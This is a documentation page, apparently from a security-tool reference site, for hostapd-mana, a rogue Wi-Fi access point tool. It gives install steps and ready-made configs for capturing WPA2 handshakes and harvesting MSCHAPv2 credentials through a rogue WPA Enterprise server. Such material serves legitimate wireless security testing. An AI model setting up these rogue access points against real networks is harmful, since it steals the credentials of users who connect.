> ## Documentation Index
> Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt
> Use this file to discover all available pages before exploring further.

# hostapd-mana

> Rogue access point tool: captures WPA2 handshakes from probing clients and harvests MSCHAPv2 credentials from WPA Enterprise targets.

## Overview

hostapd-mana is a patched version of hostapd that adds rogue AP capabilities. It responds to client probe requests to capture WPA2 handshakes from clients probing for offline networks, and captures MSCHAPv2 credentials from WPA Enterprise clients that connect to a rogue 802.1X server.

***

## Install

```bash theme={"dark"}
# From package
sudo apt install hostapd-mana

# From source
sudo apt install libssl-dev libnl-3-dev libnl-genl-3-dev
git clone https://github.com/sensepost/hostapd-mana.git
cd hostapd-mana/hostapd && make && sudo make install
```

***

## Usage

```bash theme={"dark"}
sudo hostapd-mana <config.conf>
```

***

## Config: WPA2 PSK Handshake Capture

Captures handshakes from clients probing for a WPA2 network that is not currently in range.

`hostapd.conf`:

```
interface=wlan1
driver=nl80211
hw_mode=g
channel=<CHANNEL>
ssid=<TARGET-SSID>
mana_wpaout=hostapd.hccapx
wpa=2
wpa_key_mgmt=WPA-PSK
wpa_pairwise=TKIP CCMP
wpa_passphrase=12345678
```

Stop with `CTRL+C` when `AP-STA-POSSIBLE-PSK-MISMATCH` appears.

***

## Config: WPA Enterprise Credential Capture

Runs a rogue 802.1X/RADIUS server. Captures MSCHAPv2 hashes from connecting clients.

Requires FreeRADIUS certificates, see FreeRADIUS section below.

`network.conf`:

```
ssid=<TARGET-SSID>
interface=<MANAGED-INTERFACE>
driver=nl80211
channel=<CHANNEL>
hw_mode=a
ieee8021x=1
eap_server=1
eapol_key_index_workaround=0
eap_user_file=/etc/hostapd-mana/mana.eap_user
ca_cert=/etc/freeradius/3.0/certs/ca.pem
server_cert=/etc/freeradius/3.0/certs/server.pem
private_key=/etc/freeradius/3.0/certs/server.key
private_key_passwd=whatever
dh_file=/etc/freeradius/3.0/certs/dh
auth_algs=1
wpa=3
wpa_key_mgmt=WPA-EAP
wpa_pairwise=CCMP TKIP
mana_wpe=1
mana_credout=/tmp/hostapd.credoutfile
mana_eapsuccess=1
mana_eaptls=1
```

EAP user file (`/etc/hostapd-mana/mana.eap_user`):

```
*    PEAP,TTLS,TLS,FAST
"t"  TTLS-PAP,TTLS-CHAP,TTLS-MSCHAP,MSCHAPV2,MD5,GTC,TTLS,TTLS-MSCHAPV2  "pass"  [2]
```

***

## Key Config Options

| Option                | Description                               |
| --------------------- | ----------------------------------------- |
| `mana_wpe=1`          | Enable WPE (credential capture)           |
| `mana_credout=<file>` | Path to write captured credentials        |
| `mana_eapsuccess=1`   | Send EAP-Success to keep client connected |
| `mana_eaptls=1`       | Enable EAP-TLS capture                    |
| `mana_wpaout=<file>`  | Write WPA handshakes to hccapx file       |

***

## FreeRADIUS Certificate Generation

Required for WPA Enterprise rogue AP:

```bash theme={"dark"}
sudo apt install freeradius freeradius-utils
cd /etc/freeradius/3.0/certs
nano ca.cnf       # set CA details (country, org, CN)
nano server.cnf   # set server details
rm dh
make
```
